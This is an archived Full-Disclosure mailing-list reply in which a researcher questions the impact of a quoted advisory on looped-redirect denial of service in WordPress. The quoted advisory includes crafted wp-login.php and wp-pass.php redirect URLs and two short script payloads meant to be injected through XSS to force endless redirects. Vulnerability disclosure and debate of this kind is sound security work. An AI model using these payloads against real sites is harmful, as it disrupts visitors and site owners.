[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Denial of Service in WordPress

To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Denial of Service in WordPress
From: Ryan Dewhurst <ryandewhurst@xxxxxxxxx>
Date: Thu, 27 Jun 2013 19:34:46 +0200

This just affects the client though right? So doesn't DoS a WordPress blog,
just presents an error message to the user if they click on a crafted link.
How could this be used in the real world to cause any risk?

From my understanding you'd have to get the user to click on the tinyurl,
which would then show them a browser redirect error? If this is the case,
how does this benefit an attacker?


On Thu, Jun 27, 2013 at 7:28 PM, MustLive <mustlive@xxxxxxxxxxxxxxxxxx>wrote:

> Hello list!
>
> These are Denial of Service vulnerabilities WordPress. Which I've
> disclosed two days ago 
> (http://websecurity.com.ua/**6600/<http://websecurity.com.ua/6600/>
> ).
>
> About XSS vulnerabilities in WordPress, which exist in two redirectors, I
> wrote last year 
> (http://seclists.org/**fulldisclosure/2012/Mar/343<http://seclists.org/fulldisclosure/2012/Mar/343>).
> About Redirector vulnerabilities in these WP scripts I wrote already in
> 2007 (and made patches for them). The developers fixed redirectors in WP
> 2.3, so Redirector and XSS attacks are possible only in previous versions.
>
> As I've recently checked, this functionality can be used for conducting
> DoS attacks. I.e. to make Looped DoS vulnerabilities from two redirectors
> (according to Classification of DoS vulnerabilities in web applications (
> http://websecurity.com.ua/**2663/) <http://websecurity.com.ua/2663/)>),
> by combining web site on WordPress with redirecting service or other site.
> This attack is similar to looping two redirectors, described in my articles
> Redirectors' hell and Hellfire for redirectors. The interesting, that
> looped redirector 
> (http://tinyurl.com/hellfire-**url<http://tinyurl.com/hellfire-url>),
> which I've made at 5th of February 2009 for my article Hellfire for
> redirectors, is still working.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are all versions of WordPress: for easy attack - WP 2.2.3 and
> previous versions, for harder attack - WP 3.5.2 and previous versions. The
> second variant of attack requires Redirector or XSS vulnerability at the
> same domain, as web site on WP.
>
> ----------
> Details:
> ----------
>
> Denial of Service (WASC-10):
>
> It's needed to create Custom alias at tinyurl.com or other redirector
> service, which will be leading to wp-login.php or wp-pass.php with setting
> alias for redirection.
>
> http://site/wp-login.php?**action=logout&redirect_to=**
> http://tinyurl.com/loopeddos1<http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1>
>
> http://site/wp-pass.php?_wp_**http_referer=http://tinyurl.**com/loopeddos2<http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2>
>
> Here are examples of these vulnerabilities:
>
> http://tinyurl.com/loopeddos1
>
> http://tinyurl.com/loopeddos2
>
> This attack will work for WordPress < 2.3. At that Mozilla, Firefox,
> Chrome and Opera will stop endless redirect after series of requests,
> unlike IE.
>
> To make this attack work in all versions of the engine, including
> WordPress 3.5.2, it's needed that redirector was on the same domain, as web
> site on WP. For this it can be used any vulnerability, e.g. reflected XSS
> or persistent XSS (at the same domain), for including a script for
> redirecting to one of these redirectors:
>
> WordPress_Looped_DoS.html
>
> <script>document.location="htt**p://site/wp-login.php?action=**
> logout&redirect_to=http://**site/WordPress_Looped_DoS.html<http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html>
> **"</script>
>
> WordPress_Looped_DoS-2.html
>
> <script>document.location="htt**p://site/wp-pass.php<http://site/wp-pass.php>
> "</script>
>
> This attack will work as in WordPress 3.5.2 and previous versions, as it
> isn't stopping by the browsers (endless redirect).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ______________________________**_________________
> Full-Disclosure - We believe in it.
> Charter: 
> http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html>
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Denial of Service in WordPress
  - From: MustLive

References:
- [Full-disclosure] Denial of Service in WordPress
  - From: MustLive

Prev by Date: [Full-disclosure] Denial of Service in WordPress
Next by Date: [Full-disclosure] Please update your plant. On recent WinCC SCADA fixes
Previous by thread: [Full-disclosure] Denial of Service in WordPress
Next by thread: Re: [Full-disclosure] Denial of Service in WordPress
Index(es):
- Date
- Thread